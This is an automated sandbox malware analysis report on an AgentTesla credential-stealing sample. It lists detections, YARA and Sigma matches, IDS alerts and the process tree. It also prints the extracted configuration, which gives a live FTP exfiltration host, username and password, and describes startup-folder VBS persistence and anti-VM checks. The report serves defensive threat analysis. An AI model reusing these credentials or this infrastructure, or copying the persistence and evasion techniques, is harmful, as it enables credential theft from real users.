Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RHOqJ5BrHW.exe

Overview

General Information

Sample name:RHOqJ5BrHW.exe
renamed because original name is a hash value
Original sample name:382b40ce3e7d7fc44a80d1b9190914a401c968be78c7115a8e4e3ccd40b8888d.exe
Analysis ID:1588621
MD5:bc7fee37d8d779b635750bce96b9ecd9
SHA1:7ea7eb2001c6a29d93f2d780dbf2ef37070689be
SHA256:382b40ce3e7d7fc44a80d1b9190914a401c968be78c7115a8e4e3ccd40b8888d
Tags:exeuser-zhuzhu0009
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RHOqJ5BrHW.exe (PID: 3348 cmdline: "C:\Users\user\Desktop\RHOqJ5BrHW.exe" MD5: BC7FEE37D8D779B635750BCE96B9ECD9)
    • unjuridically.exe (PID: 6948 cmdline: "C:\Users\user\Desktop\RHOqJ5BrHW.exe" MD5: BC7FEE37D8D779B635750BCE96B9ECD9)
      • RegSvcs.exe (PID: 5728 cmdline: "C:\Users\user\Desktop\RHOqJ5BrHW.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 5968 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • unjuridically.exe (PID: 4564 cmdline: "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" MD5: BC7FEE37D8D779B635750BCE96B9ECD9)
      • RegSvcs.exe (PID: 6520 cmdline: "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
          • 0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
          • 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
          • 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
          • 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
          • 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
          • 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
          • 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
          • 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
          00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
          • 0x3196b:$s2: GetPrivateProfileString
          • 0x31018:$s3: get_OSFullName
          • 0x32706:$s5: remove_Key
          • 0x328b3:$s5: remove_Key
          • 0x33795:$s6: FtpWebRequest
          • 0x34717:$s7: logins
          • 0x34c89:$s7: logins
          • 0x3798e:$s7: logins
          • 0x37a4c:$s7: logins
          • 0x393a1:$s7: logins
          • 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
          Click to see the 22 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.unjuridically.exe.1f30000.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            5.2.unjuridically.exe.1f30000.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              5.2.unjuridically.exe.1f30000.1.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                5.2.unjuridically.exe.1f30000.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x34735:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x347a7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x34831:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x348c3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x3492d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x3499f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x34a35:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x34ac5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                5.2.unjuridically.exe.1f30000.1.raw.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                • 0x3196b:$s2: GetPrivateProfileString
                • 0x31018:$s3: get_OSFullName
                • 0x32706:$s5: remove_Key
                • 0x328b3:$s5: remove_Key
                • 0x33795:$s6: FtpWebRequest
                • 0x34717:$s7: logins
                • 0x34c89:$s7: logins
                • 0x3798e:$s7: logins
                • 0x37a4c:$s7: logins
                • 0x393a1:$s7: logins
                • 0x385e6:$s9: 1.85 (Hash, version 2, native byte-order)
                Click to see the 18 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , ProcessId: 5968, ProcessName: wscript.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs" , ProcessId: 5968, ProcessName: wscript.exe

                Data Obfuscation

                barindex
                Sigma detected: Drops script at startup location
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe, ProcessId: 6948, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T03:19:36.997199+010020299271A Network Trojan was detected192.168.2.549708162.241.62.6321TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-11T03:19:37.399129+010028555421A Network Trojan was detected192.168.2.549714162.241.62.6335211TCP
                2025-01-11T03:19:37.404623+010028555421A Network Trojan was detected192.168.2.549714162.241.62.6335211TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: RHOqJ5BrHW.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeAvira: detection malicious, Label: HEUR/AGEN.1319212
                Found malware configuration
                Source: 5.2.unjuridically.exe.1f30000.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.antoniomayol.com:21", "Username": "johnson@antoniomayol.com", "Password": "cMhKDQUk1{;%"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeReversingLabs: Detection: 57%
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeVirustotal: Detection: 62%Perma Link
                Multi AV Scanner detection for submitted file
                Source: RHOqJ5BrHW.exeReversingLabs: Detection: 57%
                Source: RHOqJ5BrHW.exeVirustotal: Detection: 62%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: RHOqJ5BrHW.exeJoe Sandbox ML: detected
                Source: RHOqJ5BrHW.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: wntdll.pdbUGP source: unjuridically.exe, 00000002.00000003.2060949043.0000000003470000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2063562070.0000000003610000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2189115994.0000000004100000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2193118279.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: unjuridically.exe, 00000002.00000003.2060949043.0000000003470000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000002.00000003.2063562070.0000000003610000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2189115994.0000000004100000.00000004.00001000.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000003.2193118279.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_009C6CA9
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009C60DD
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009C63F9
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009CEB60
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_009CF5FA
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009CF56F FindFirstFileW,FindClose,0_2_009CF56F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D1B2F
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D1C8A
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009D1F94
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00466CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00466CA9
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_004660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_004660DD
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_004663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_004663F9
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0046EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0046EB60
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0046F56F FindFirstFileW,FindClose,2_2_0046F56F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0046F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0046F5FA
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00471B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00471B2F
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00471C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00471C8A
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00471F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00471F94

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49714 -> 162.241.62.63:35211
                Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49708 -> 162.241.62.63:21
                Yara detected Generic Downloader
                Source: Yara matchFile source: 5.2.unjuridically.exe.1f30000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.unjuridically.exe.3430000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: global trafficTCP traffic: 192.168.2.5:49714 -> 162.241.62.63:35211
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                Source: Joe Sandbox ViewIP Address: 162.241.62.63 162.241.62.63
                Source: unknownDNS query: name: ip-api.com
                Source: unknownFTP traffic detected: 162.241.62.63:21 -> 192.168.2.5:49708 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 20:19. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 20:19. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 20:19. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009D4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_009D4EB5
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                Source: global trafficDNS traffic detected: DNS query: ftp.antoniomayol.com
                Source: RegSvcs.exe, 00000003.00000002.2202546408.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.000000000302E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://antoniomayol.com
                Source: RegSvcs.exe, 00000003.00000002.2202546408.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.000000000302E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.antoniomayol.com
                Source: RegSvcs.exe, 00000003.00000002.2202546408.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.0000000002FDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                Source: unjuridically.exe, 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2202546408.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, unjuridically.exe, 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.0000000002FDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                Source: RegSvcs.exe, 00000003.00000002.2202546408.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4495084882.0000000002FDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: unjuridically.exe, 00000002.00000002.2067353396.0000000003430000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2198847445.0000000000402000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009D6B0C
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009D6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_009D6D07
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00476D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00476D07
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009D6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_009D6B0C
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009C2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_009C2B37
                Source: C:\Users\user\Desktop\RHOqJ5BrHW.exeCode function: 0_2_009EF7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,6F58CB00,6F58C2F0,SetCapture,ClientToScreen,6F58C530,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_009EF7FF
                Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_0048F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,6F58CB00,6F58C2F0,SetCapture,ClientToScreen,6F58C530,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0048F7FF

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 5.2.unjuridically.exe.1f30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 5.2.unjuridically.exe.1f30000.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                Source: 5.2.unjuridically.exe.1f30000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 5.2.unjuridically.exe.1f30000.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                Source: 2.2.unjuridically.exe.3430000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 2.2.unjuridically.exe.3430000.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                Source: 2.2.unjuridically.exe.3430000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 2.2.unjuridically.exe.3430000.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 00000005.00000002.2201362371.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
